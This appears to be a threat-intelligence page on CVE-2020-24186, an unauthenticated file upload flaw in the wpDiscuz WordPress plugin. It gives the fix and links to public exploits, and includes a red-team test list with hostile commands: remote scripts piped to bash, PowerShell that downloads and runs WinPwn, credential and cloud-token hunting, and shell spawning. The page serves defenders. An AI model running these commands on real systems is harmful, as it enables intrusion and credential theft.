CVE-2020-24186
Overview
This vulnerability is an arbitrary file upload flaw rooted in insufficient validation of user-supplied input within the wpDiscuz plugin's AJAX handler. Specifically, the wmuUploadFiles AJAX action fails to restrict file types, enabling unauthenticated users to upload executable files. The affected component is the file upload mechanism in wpDiscuz versions 7.0 through 7.0.4 for WordPress, where the input sanitization and access control checks are improperly implemented.
Vulnerability Description
A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.
Impact
An unauthenticated attacker can leverage this vulnerability to upload arbitrary files, including web shells, enabling remote code execution on the affected server. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), allowing attackers to execute arbitrary commands remotely. This can lead to full system compromise, data theft, and persistent backdoor installation, severely impacting the confidentiality, integrity, and availability of the WordPress environment hosting the wpDiscuz plugin.
Solution
Users should upgrade the wpDiscuz plugin to version 7.0.5 or later, where the arbitrary file upload vulnerability is patched, as detailed in the Wordfence advisory (https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/). The update enforces strict file type validation and proper access controls on the wmuUploadFiles AJAX action. Administrators are advised to apply this update promptly to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists in the gVectors wpDiscuz plugin for WordPress, specifically versions 7.0 through 7.0.4, which allows for remote code execution due to improper handling of file uploads. This security flaw enables unauthenticated users to upload arbitrary files, including potentially malicious PHP scripts, through the wmuUploadFiles AJAX action. The lack of stringent validation and sanitization of uploaded files is the root cause of this vulnerability, allowing attackers to exploit it easily. Once a malicious file is uploaded, an attacker can execute arbitrary code on the server, leading to full control over the affected WordPress instance.
The attack vectors for this vulnerability are straightforward yet highly effective. An attacker can craft a request to the vulnerable AJAX endpoint, bypassing any authentication mechanisms that would typically restrict file uploads. By leveraging this flaw, an attacker can upload a PHP file disguised as a harmless image or document. Once uploaded, the attacker can access the file directly via the web server, executing any code contained within it. This scenario can lead to a variety of malicious activities, including data exfiltration, website defacement, or the installation of backdoors for persistent access.
The real-world impact of this vulnerability is significant, especially for organizations relying on WordPress for their online presence. The potential for remote code execution means that an attacker could gain complete control over the website, leading to severe business risks such as data breaches, loss of customer trust, and financial repercussions. Furthermore, compromised websites can be used as launching points for further attacks, potentially affecting other connected systems or users. The reputational damage associated with such incidents can be long-lasting, making it imperative for organizations to take proactive measures to secure their web applications.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to keep all plugins and themes up to date, as developers regularly release patches to address known vulnerabilities. Regular security audits and vulnerability assessments can help identify outdated or vulnerable components within the WordPress ecosystem. Additionally, employing a web application firewall (WAF) can provide an additional layer of security by filtering out malicious requests before they reach the application. Organizations should also enforce strict file upload policies, ensuring that only specific file types are allowed and that all uploaded files are scanned for malware.
In conclusion, the remote code execution vulnerability in the gVectors wpDiscuz plugin poses a severe threat to WordPress installations, allowing attackers to upload and execute arbitrary code. The simplicity of the attack vector and the potential for significant impact underscore the importance of maintaining robust security practices. By staying vigilant and implementing effective detection and mitigation strategies, organizations can protect their web applications from exploitation and safeguard their digital assets against evolving threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2020-24186 vulnerability within the gVectors wpDiscuz plugin. Our telemetry indicates a renewed surge in attacker activity leveraging the unauthenticated arbitrary file upload vector, with the EPSS score rising slightly, reflecting increased likelihood of exploitation in the near term. This uptick is corroborated by the emergence of additional proof-of-concept exploits circulating in public repositories, which lowers the technical barrier for threat actors to weaponize this flaw. The growing exploitation momentum heightens the risk to WordPress environments still running affected plugin versions, as adversaries can execute remote code without authentication, potentially leading to full system compromise. Consequently, the threat level associated with this vulnerability has intensified, underscoring an elevated operational priority for defenders monitoring WordPress plugin security.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gvectors | Wpdiscuz | All |
cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress wpDiscuz Unauthenticated File Upload Vulnerability
exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
|
Chloe Chamberland, Hoa Nguyen - SunCSR | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) | UnD3sc0n0c1d0 | webapps | php | - | View |
| WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) | Fellipe Oliveira | webapps | php | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE
wpDiscuz 7.0.4 Remote Code Execution
|
hev0x | 19 | 2 | 2021-06-13 | View |
|
substing/CVE-2020-24186_reverse_shell_upload
|
substing | 13 | 4 | 2023-12-21 | View |
|
Sakura-501/CVE-2020-24186-exploit
CVE-2020-24186的攻击脚本
|
Sakura-501 | 3 | 3 | 2022-04-05 | View |
|
wvverez/CVE-2020-24186
Exploit para RCE (Remote Code Exec) CVE de plugin vulnerable en Wordpress WP-Discuz en versión 7.0.4
|
wvverez | 1 | 0 | 2026-06-24 | View |
|
GazettEl/CVE-2020-24186
|
GazettEl | 0 | 0 | 2025-03-05 | View |
|
meicookies/CVE-2020-24186
WpDiscuz 7.0.4 Arbitrary File Upload Exploit
|
meicookies | 0 | 0 | 2021-08-13 | View |
|
sec-dojo-com/CVE-2020-24186
|
sec-dojo-com | 0 | 0 | 2025-11-29 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-24186 |
| wordfence.com |
GitHub CVE
x_refsource_MISC
|
https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163012/WordPress-wpDiscuz-7.0.4-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163302/WordPress-wpDiscuz-7.0.4-Shell-Upload.html |